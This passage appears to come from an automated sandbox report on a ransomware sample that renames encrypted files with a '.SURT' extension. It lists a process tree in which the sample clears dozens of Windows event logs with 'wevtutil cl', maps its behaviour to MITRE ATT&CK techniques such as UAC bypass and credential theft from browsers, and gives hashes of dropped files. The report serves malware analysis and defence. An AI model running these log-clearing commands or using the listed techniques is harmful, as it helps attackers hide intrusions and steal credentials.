C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"4⤵PID:5032
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"4⤵PID:4788
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"4⤵
- Clears Windows event logs
PID:5060
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"4⤵PID:5072
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"4⤵
- Clears Windows event logs
PID:5080
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"4⤵PID:5092
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"4⤵PID:5108
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"4⤵
- Clears Windows event logs
PID:5116
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"4⤵PID:3328
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"4⤵PID:3316
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"4⤵PID:3300
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"4⤵PID:3820
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"4⤵
- Clears Windows event logs
PID:3888
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"4⤵PID:3808
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"4⤵PID:3924
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"4⤵PID:3276
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"4⤵PID:2884
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"4⤵PID:2124
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"4⤵PID:3172
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"4⤵PID:3164
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"4⤵PID:1048
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2696
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Indicator Removal
4Clear Windows Event Logs
1File Deletion
3Modify Registry
4Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi.[[email protected]].SURT
Filesize24.4MB
MD5f61650365e0f0f1ef2f7b28042cd5372
SHA17a64e36c227926656f3b02637e423b774bfc32f1
SHA256122dae00846a47e74ba7f40d67cd00deb2ef5c638c5cf7f382fc89b271fc4613
SHA512d7ae56d5bd5046bd91d9e225f9e641de88a4cd073d4a288030003035b10a37874cff4bed928ce27ef7bce996cedc0c2fc2de195ac76ec1f67131a645443bae2c
-
Filesize
8KB
MD583d6310af277d848c6c9d1e414ef55fd
SHA194c26968361b7310be9bffd54357aa6eb3a6d5c8
SHA2568fefff486cd01190533e7dfd8b2df8ce85385f2becad06981b9d1b5b07f63809
SHA512258b1d9b24812467a38a91a3f37e140af39f2bc73e74f19368496e79d223ea566fb80f5d305c7d126aa99f3ba64e2dd5f25ed86a024e03ec41a0a4caf29142c5
-
Filesize
621B
MD520ccd3a32faf038b9523595a15091b62
SHA16332650d11425dbf1a78864d21ec9defa32641b8
SHA256283de93f74edbe7589ae6e751204b153de5dedf645472cd7142fda6712547857
SHA5122fbdfac8b3949d16fda305e99f806b0a8b20ec429d4520b74e3604c97b4462e881b8620d485b5b9f761f9029f32c54cd1b34bc0b5a4d588e42a4dcdb0d171711
-
Filesize
14B
MD59158f5e91d7f2553704044780f5427e9
SHA1666cee68395365a5be3f7c63f8b71f5af2b6e7f6
SHA256141a1c0762c683a8cea980b3539abedf769957209d208344d3a3b2ae98eb9dea
SHA5120c6ee588caea5fd55f56761375904e262806e024fdfa306408e97981a0b3fe40cd9d2b09461a4ed24a9a51f0f4f4bf6b57b52ce8807666a47816ae1941f087d6
-
Filesize
1KB
MD5715b7c40b1c2d2c048e9cebbf48c7a58
SHA1090c4dc6953ccaea0b62deba763f18791f9d99a3
SHA2563eb38a92684eca26fe72bbdb001c17f808057e9f4d8d4559e579010be11d8c85
SHA512aaf37e39a5833f19bfbe7b4ef868b66d604427153748ce37ee251869c4ed0e5620e97f8ca26e520b9b0169f09173ab3fff3cdb98dfdd5b9f30af603c23f7635f
-
Filesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
Filesize
30KB
MD533f7fc301be9d39fcb474fb8b1e5f42e
SHA1a3bf9ddb2ac53bc4b12b249825189a7c7a07b766
SHA25699cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03
SHA5126cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00
-
Filesize
78KB
MD53257eb22824b57fe3d58074bca3128d3
SHA16f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97
SHA2565afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad
SHA5127b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d
-
Filesize
204B
MD51fe5444328b87d2339fbce9e16202cc8
SHA18307d06669bcd0a59777dddfaf7ffa0bcadf5e21
SHA256ba4ba6f99f1ebd029f4cbfcb6b2637372eeaceb0981768baeb5f0d0c19cbbb36
SHA51244b24dbf60e61cfba185db17626869855539c4a945e4d76fb20d1c524e72072fc23460a86198292c5fe218ad46dd367464822c9538b62a78ad3ab9f3f3cbf12f
-
C:\Users\Admin\Documents\SaveClose.mht.[[email protected]].SURT
Filesize363KB
MD5d18b52f9502a0af9ae6796188cecf0a8
SHA10be876c6bb1421caefbd6a1c7f7207bad05ed282
SHA2564df1e122eaada1909781d9e6782ad13b844bb04b5482238976610852082e961a
SHA5126c5f4f21b0f6b59c249e96da21a22cf461a6bb6100c9f976499a74ab0c5ae24f98e3738f329d79c29567d98c5b8fdb9b2111e1899da3538982eab9d7f2a61ddb